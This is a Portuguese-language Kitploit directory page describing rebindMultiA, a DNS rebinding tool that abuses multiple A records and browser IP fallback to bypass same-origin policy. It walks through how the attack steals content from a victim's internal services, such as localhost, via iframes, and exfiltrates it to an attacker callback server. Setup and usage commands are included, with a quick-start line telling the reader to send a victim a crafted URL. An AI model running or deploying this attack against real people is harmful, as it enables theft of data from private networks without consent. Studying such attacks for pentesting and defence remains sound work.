Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
rebindMultiA — Ferramenta de ataque de reassociação de DNS que explora múltiplos registros A para contornar a política de mesma origem e exfiltrar dados de serviços de rede interna por meio do comportamento de fallback do navegador. | Kitploit
Ferramentas/GitHubGitHub/rhynorater/rebindmultia
ExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed TeamingAnálise de DNS
GitHubrhynorater/rebindmultia

rebindMultiA

Ferramenta de ataque de reassociação de DNS que explora múltiplos registros A para contornar a política de mesma origem e exfiltrar dados de serviços de rede interna por meio do comportamento de fallback do navegador.

Ver Repositório
649há 3 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

rebindMultiA

rebindMultiA é uma ferramenta para realizar um ataque de rebind de Múltiplos Registros A.

rebindmultia.com é um domínio que configurei para auxiliar nesses ataques. Ele faz com que cada IP seja seu próprio servidor de nomes autoritativo para o domínio [IP].ns.rebindmultia.com. Por exemplo, o servidor de nomes autoritativo de 13.33.33.37.ns.rebindmultia.com é 13.33.33.37.ip.rebindmultia.com, que resolve (como você deve ter adivinhado) para 13.33.33.37.

Ataque de Rebind de Múltiplos Registros A

O ataque de Rebind de MultiRegistro A é uma variante do DNS Rebinding que explora a capacidade de um atacante de responder com dois endereços IP em resposta a uma solicitação DNS e a tendência do navegador de cair de volta para o segundo IP na resposta DNS quando o primeiro não responde. Neste ataque, o atacante configurará um servidor DNS malicioso e dois servidores HTTP maliciosos. O servidor DNS responderá com dois registros A:

root@kitploit:~
127.0.0.1.target.13.33.33.37.ns.rebindmultia.com. 0 IN A 13.33.33.37
127.0.0.1.target.13.33.33.37.ns.rebindmultia.com. 0 IN A 127.0.0.1

O navegador da vítima então se conectará ao primeiro IP e começará a interagir com o primeiro servidor HTTP malicioso do atacante. Este servidor responderá com uma página que contém dois iframes, um para /steal e outro para /rebind. O iframe /steal carregará uma página maliciosa para acessar o segundo iframe e capturar o conteúdo. O endpoint /rebind, quando acessado, emitirá um redirecionamento 302 para / e eliminará o primeiro servidor HTTP malicioso. Como resultado, quando o navegador tentar novamente acessar o servidor HTTP do atacante, encontrará uma porta fechada. Como tal, ele cairá de volta para o segundo IP. Uma vez que o conteúdo alvo tenha sido carregado no segundo iframe, o primeiro iframe pode acessá-lo, roubar os dados e exfiltrá-los para o segundo servidor HTTP malicioso do atacante - o servidor de callback.

Este ataque funciona apenas em ambiente Windows. Linux e Mac usarão o IP privado primeiro e o servidor do atacante nunca será consultado.

Gráfico + Explicação

Screenshot

  1. O navegador resolve o host 127.0.0.1.target.13.33.33.37.ns.rebindmultia.com.
  2. O servidor DNS (incluído em server.py) analisa o nome DNS solicitado e retorna dois registros A: 13.33.33.37 e 127.0.0.1.
  3. O navegador da vítima se conecta ao servidor HTTP malicioso do atacante (incluído em server.py) e carrega a página /parent que contém dois iframes.
  4. O navegador da vítima carrega /steal do servidor HTTP malicioso do atacante.
  5. O navegador da vítima carrega /rebind que resulta em um redirecionamento 302 para / (o servidor HTTP será encerrado após esta solicitação).
  6. O navegador da vítima redireciona para / conforme o 302 do servidor do atacante.
  7. O navegador da vítima tenta carregar / do servidor HTTP do atacante (agora inativo), mas falha.

Uso

root@kitploit:~
pip3 install -r requirements.txt
python3 server.py --help
root@kitploit:~
usage: server.py [-h] [-p PORT] [-c CALLBACK_PORT] [-d DNS_PORT] [-f FILE] [-l LOCATION]

argumentos opcionais:
  -h, --help            mostra esta mensagem de ajuda e sai
  -p PORT, --port PORT  Especifica a porta para atacar no IP alvo. Padrão: 80
  -c CALLBACK_PORT, --callback-port CALLBACK_PORT
                        Especifica a porta do servidor HTTP de callback. Padrão: 31337
  -d DNS_PORT, --dns-port DNS_PORT
                        Especifica a porta do servidor DNS. Padrão: 53
  -f FILE, --file FILE  Especifica o arquivo HTML a ser exibido no primeiro iframe. (O iframe "steal"). Padrão: steal.html
  -l LOCATION, --location LOCATION
                        Especifica a localização dos dados que você deseja roubar no alvo. Padrão: /

Se você receber este erro:

root@kitploit:~
┬─[justin@RhynoDroplet:~/p/rebindMultiA]─[14:26:24]─[G:master=]
╰─>$ python3 server.py

Traceback (most recent call last):
  File "server.py", line 2, in <module>
    from http.server import HTTPServer, BaseHTTPRequestHandler, ThreadingHTTPServer
ImportError: cannot import name 'ThreadingHTTPServer'

Então você precisa usar uma versão mais atualizada do Python. Python 3.7+.

Início Rápido

Isso deve ser executado a partir de um IP publicamente acessível.

root@kitploit:~
git clone https://github.com/Rhynorater/rebindMultiA
cd rebindMutliA
pip3 install -r requirements.txt
echo "Envie sua vítima para http://127.0.0.1.target.`curl -s http://ipinfo.io/ip`.ns.rebindmultia.com/parent para exfiltrar 127.0.0.1"
sudo python3 server.py
Baixar ferramenta
  • O navegador então muda para o segundo IP no cache DNS e resolve o nome de host para 127.0.0.1. Em seguida, ele se conecta a esse servidor e carrega a página no iframe.
  • O iframe steal do atacante acessa o segundo iframe recém-carregado e captura o conteúdo.
  • O iframe steal do atacante então envia os resultados de volta para o servidor de callback do atacante.